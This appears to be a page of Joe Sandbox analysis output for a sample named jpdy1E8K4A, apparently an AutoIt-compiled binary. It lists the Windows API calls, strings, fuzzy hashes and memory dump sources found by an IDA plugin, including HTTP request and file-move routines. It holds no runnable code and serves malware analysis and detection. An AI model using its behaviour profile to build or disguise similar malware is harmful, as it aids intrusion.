                                                                                                • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                                                                • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                                                                • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                                • API String ID: 0-1603158881
                                                                                                • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                                                                • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                                                                • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                                                                APIs
                                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D06
                                                                                                • DestroyWindow.USER32(?), ref: 00426F50
                                                                                                • UnregisterHotKey.USER32(?), ref: 00426F77
                                                                                                • FreeLibrary.KERNEL32(?), ref: 0042701F
                                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00427050
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                                • String ID: close all$#v
                                                                                                • API String ID: 4174999648-3101823635
                                                                                                • Opcode ID: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                • Instruction ID: 89fc9d45334329c88beddca7a6314a06ce6e15860ee53b488cbf8147960762b2
                                                                                                • Opcode Fuzzy Hash: 4fd900de9a28da208b58a3ba22ecdd4c26f042792ef41b4fe823b5ed5eb78ac9
                                                                                                • Instruction Fuzzy Hash: 9BA1C174710212CFC710EF15C985B5AF3A8BF48304F5045AEE909672A2CB78BD96CF99
                                                                                                APIs
                                                                                                • CreateMenu.USER32 ref: 00448603
                                                                                                • SetMenu.USER32(?,00000000), ref: 00448613
                                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                                                                • IsMenu.USER32(?), ref: 004486AB
                                                                                                • CreatePopupMenu.USER32 ref: 004486B5
                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                                                                • DrawMenuBar.USER32 ref: 004486F5
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                • String ID: 0
                                                                                                • API String ID: 161812096-4108050209
                                                                                                • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                                                                • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                                                                • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                                                                 Memory Dump Source
                                                                                                 • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                 • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                 • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                APIs
                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                  • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                                                                • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                                                                Similarity
                                                                                                • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                                • String ID:
                                                                                                • API String ID: 978794511-0
                                                                                                Similarity
                                                                                                • API ID: ClearVariant
                                                                                                • String ID:
                                                                                                • API String ID: 1473721057-0
                                                                                                Similarity
                                                                                                • API ID: _memmove$_memcmp
                                                                                                • String ID: '$\$h
                                                                                                • API String ID: 2205784470-1303700344
                                                                                                APIs
                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045EA56
                                                                                                • VariantCopy.OLEAUT32(00000000), ref: 0045EA60
                                                                                                • VariantClear.OLEAUT32 ref: 0045EA6D
                                                                                                • VariantTimeToSystemTime.OLEAUT32 ref: 0045EC06
                                                                                                • __swprintf.LIBCMT ref: 0045EC33
                                                                                                • VariantInit.OLEAUT32(00000000), ref: 0045ECEE
                                                                                                Strings
                                                                                                • %4d%02d%02d%02d%02d%02d, xrefs: 0045EC2D
                                                                                                Similarity
                                                                                                • API ID: Variant$InitTime$ClearCopySystem__swprintf
                                                                                                • String ID: %4d%02d%02d%02d%02d%02d
                                                                                                • API String ID: 2441338619-1568723262
                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C659
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C677
                                                                                                • Sleep.KERNEL32(0000000A), ref: 0042C67F
                                                                                                • InterlockedIncrement.KERNEL32(004A7F04), ref: 0042C68A
                                                                                                • InterlockedDecrement.KERNEL32(004A7F04), ref: 0042C73C
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                • String ID: @COM_EVENTOBJ
                                                                                                • API String ID: 327565842-2228938565
                                                                                                APIs
                                                                                                • VariantClear.OLEAUT32(?), ref: 0047031B
                                                                                                • VariantClear.OLEAUT32(?), ref: 0047044F
                                                                                                • VariantInit.OLEAUT32(?), ref: 004704A3
                                                                                                • DispCallFunc.OLEAUT32(?,?,?,00000015,?,?,?,?), ref: 00470504
                                                                                                • VariantClear.OLEAUT32(?), ref: 00470516
                                                                                                  • Part of subcall function 00435481: VariantCopy.OLEAUT32(?,?), ref: 00435492
                                                                                                • VariantCopy.OLEAUT32(?,?), ref: 0047057A
                                                                                                  • Part of subcall function 00435403: VariantClear.OLEAUT32(?), ref: 00435414
                                                                                                • VariantClear.OLEAUT32(00000000), ref: 0047060D
                                                                                                Similarity
                                                                                                • API ID: Variant$Clear$Copy$CallDispFuncInit
                                                                                                • String ID: H
                                                                                                • API String ID: 3613100350-2852464175
                                                                                                • Opcode ID: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                • Instruction ID: 4e55d858753f5aac0b63ea9498fb9ef25a468b81cfd7169f1740116cc4944d08
                                                                                                • Opcode Fuzzy Hash: f2b9533c7a0a825d738ebca76906f6301bd96a0988b7340563647801aa66eb79
                                                                                                • Instruction Fuzzy Hash: 93B15BB5605311EFD710DF54C880A6BB3A4FF88308F049A2EFA8997351D738E951CB9A
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AAC5
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AAFA
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,00001000), ref: 0044AB5E
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0044AB74
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB83
• HttpQueryInfoW.WININET(00000000,00000005,?,00001000,00000000), ref: 0044ABBB
  • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
• String ID:
• API String ID: 1291720006-3916222277
• Opcode ID: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction ID: 89538bfc19842651326e528327905a39262a83d8aa3acd63c003c629d13479a9
• Opcode Fuzzy Hash: 91fdcc8e85295173cca015a6521aec32459a41892940df1d160b2f6c73229ea3
• Instruction Fuzzy Hash: FA51B1756403087BF710DF56DC86FEBB7A8FB88715F00851EFB0196281D7B8A5148BA8
APIs
• GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FC48
• IsMenu.USER32(?), ref: 0045FC5F
• CreatePopupMenu.USER32 ref: 0045FC97
• GetMenuItemCount.USER32(?), ref: 0045FCFD
• InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0045FD26
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: Menu$Item$CountCreateInfoInsertPopup
• String ID: 0$2
• API String ID: 93392585-3793063076
• Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
• Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
• Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
APIs
• SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
• VariantClear.OLEAUT32(?), ref: 00435320
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
• VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
• VariantClear.OLEAUT32(?), ref: 004353B3
• SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
• String ID: crts
• API String ID: 586820018-3724388283
• Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
• Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
• Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
APIs
  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
• lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
• MoveFileW.KERNEL32(?,?), ref: 0044BC3F
• _wcscat.LIBCMT ref: 0044BCAF
• _wcslen.LIBCMT ref: 0044BCBB
• _wcslen.LIBCMT ref: 0044BCD1
• SHFileOperationW.SHELL32(?), ref: 0044BD17
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
• String ID: \*.*
• API String ID: 2326526234-1173974218
• Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
• Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
• Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
APIs
  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
• _wcslen.LIBCMT ref: 004335F2
• GetFileAttributesW.KERNEL32(?), ref: 0043361C
• GetLastError.KERNEL32 ref: 0043362B
• CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
• _wcsrchr.LIBCMT ref: 00433666
  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
• String ID: \
• API String ID: 321622961-2967466578
• Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
• Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
• Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: __wcsnicmp
• String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
• API String ID: 1038674560-2734436370
• Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
• Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
• Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
• Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
APIs
• GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
• LoadStringW.USER32(00000000), ref: 00434060
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
• LoadStringW.USER32(00000000), ref: 00434078
• _wprintf.LIBCMT ref: 004340A1
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 0043409C
Memory Dump Source
• Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
• Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
• Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                • __lock.LIBCMT ref: 00417981
                                                                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                • __lock.LIBCMT ref: 004179A2
                                                                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2150829891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2150808731.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150901559.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150925288.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150945840.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2150965974.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.2151032045.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_jpdy1E8K4A.jbxd
                                                                                                Similarity
                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                • String ID: KERNEL32.DLL$pI
                                                                                                • API String ID: 637971194-197072765
                                                                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                APIs
                                                                                                Similarity
                                                                                                • API ID: _memmove$_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1938898002-0
                                                                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                APIs
                                                                                                • InterlockedExchange.KERNEL32(?,000001F5), ref: 0044B4A7
                                                                                                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 0044B4DA
                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0044B4F7
                                                                                                • _memmove.LIBCMT ref: 0044B555
                                                                                                • _memmove.LIBCMT ref: 0044B578
                                                                                                • LeaveCriticalSection.KERNEL32(?), ref: 0044B587
                                                                                                • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 0044B5A3
                                                                                                • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B5B8
                                                                                                Similarity
                                                                                                • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterLeave_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2737351978-0
                                                                                                • Opcode ID: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                • Instruction ID: 70cbfa243a2dcbaabd352bc30cb9c3ad46017a318630e818b765f133545e4983
                                                                                                • Opcode Fuzzy Hash: c49c3180d4577c37a1564da55573a5370bada98f09f15d951758cfc7caeaac8d
                                                                                                • Instruction Fuzzy Hash: 4F41BC71900308EFDB20DF55D984EAFB7B8EF48704F10896EF54696650D7B4EA80CB58
                                                                                                APIs
                                                                                                • ___set_flsgetvalue.LIBCMT ref: 0041523A
                                                                                                • __calloc_crt.LIBCMT ref: 00415246
                                                                                                • __getptd.LIBCMT ref: 00415253
                                                                                                • CreateThread.KERNEL32(00000000,?,004151BB,00000000,00000004,00000000), ref: 0041527A
                                                                                                • ResumeThread.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0041528A
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 00415295
                                                                                                • _free.LIBCMT ref: 0041529E
                                                                                                • __dosmaperr.LIBCMT ref: 004152A9
                                                                                                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                                                                                                Similarity
                                                                                                • API ID: Thread$CreateErrorLastResume___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                                                                                • String ID:
                                                                                                • API String ID: 3638380555-0
